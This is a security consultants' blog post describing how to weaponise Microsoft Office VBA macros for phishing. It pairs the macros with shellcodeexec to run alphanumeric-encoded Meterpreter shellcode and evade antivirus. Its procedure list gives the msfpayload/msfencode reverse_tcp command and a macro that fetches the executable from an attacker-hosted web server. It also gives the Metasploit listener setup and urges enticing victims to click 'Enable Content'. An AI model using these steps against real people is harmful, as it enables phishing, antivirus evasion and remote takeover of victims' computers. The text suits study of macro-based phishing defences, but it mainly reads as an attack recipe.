Winning With VBA Macros
As pen-testers, it is often that we come across obstacles; the technical adversaries that keep us from getting our prize in the cracker jack box. This seems to be prominent no matter if the engagement is a perimeter, enterprise, or social engineering assessment. However, no matter how much information gathering and reconnaissance is applied at the beginning, there are instances where it is just part luck that we get the prize. This is even more apparent when executing on a social engineering phishing engagement.
Phishing attacks typically leverage both solicitation techniques and technology in order to influence an individual to perform an action on behalf of the social engineer. Overall outcomes can be the disclosure of sensitive information, protected internal personnel or procedures, access to a restricted physical area, authentication credentials, or unauthorized access to a computer.
This blog post will discuss a method to gain unauthorized access to a system, circumvent anti-virus, and eventually gain a shell using VBA Macros in Microsoft Office. This is not a new concept, but it is important to note that it is an effective concept. Furthermore, successful execution does not rely on file-format vulnerabilities, but rather a feature which is ubiquitous in all MS Office products.
As previously mentioned, getting code execution from a VBA Macro is not a new idea, but the documented methods to do so will often be flagged by Anti-Virus. An initial method was included within the Metasploit framework which required embedded VBA script and an innocuous shellcode payload buried with the actual body of the document. This method can be referenced here. However, the method had certain disadvantages, such as the inclusion of an extra document page even when the shellcode is set to a font-size of one and color of white. As a result, this alone may be enough aesthetic difference to prevent a successful attack.
As an alternative, we went searching for another method which would be effective while evading anti-virus detection. One such method is leveraging Bernardo Damele’s shellcodeexec to execute alpha-numeric encoded shellcode in memory, allowing us to bypass AV. The following shellcodeexec features are provided on Bernardo’s blog:
- Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
- Can be compiled and works on 32-bit and 64-bit architectures.
- As far as I know, no AV detects it as malicious.
- Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx - Readable Writable and eXecutable.
- It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode.
- Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviors.
This method along with VBA script made for effective exploit delivery. The following video illustrates the entire process used to create VBA, call the shellcodeexec utility, and embed the shellcode. However, this is all dependent upon a victim clicking the “Enable Content” within the Office Document in order to run a Macro. Although, provide enough enticement and people will click on just about anything, so it is up to the reader to use their creativity. Here is a video showing the entire process.
Procedures used within the video:
- Download for shellcodeexec: https://github.com/inquisb/shellcodeexec
- Create or open a Word document; select “View” -> “Macros” -> “View Macros”; From the “Macros in” dropdown menu choose the name of document; Supply a name for the macro and select “Create” to create a new macro
- Generate MSF Payload: ./msfpayload windows/meterpreter/reverse_tcp LPORT=
LHOST= R | ./msfencode -e x86/alpha_mixed -t raw BufferRegister=EAX
- Copy the generated shellcode into the “shellcode” string variable inside the macro editor; replace the ip address with your hostname or ip address in the call to objXMLHTTP.Open
- Save the Word doc as a Word 97-2003 Document (.doc)
- Change into the same directory of shellcodexec and start twistd web server: twistd web --path=. --port=80
- Start msfconsole and issue the following:
- use exploit/multihandler
- set payload windows/meterpreter/reverse_tcp
- set LHOST
- set LPORT
- set ExitOnSession false
- exploit –j –z
The VBA code used in the video was written by:
Chris Patten @PacketAssailant
Tom Steele @theL1on
*All credit for shellcodeexec goes to Bernardo Damele
Thomas Steele, Security Consultant
Chris Patten, Security Consultant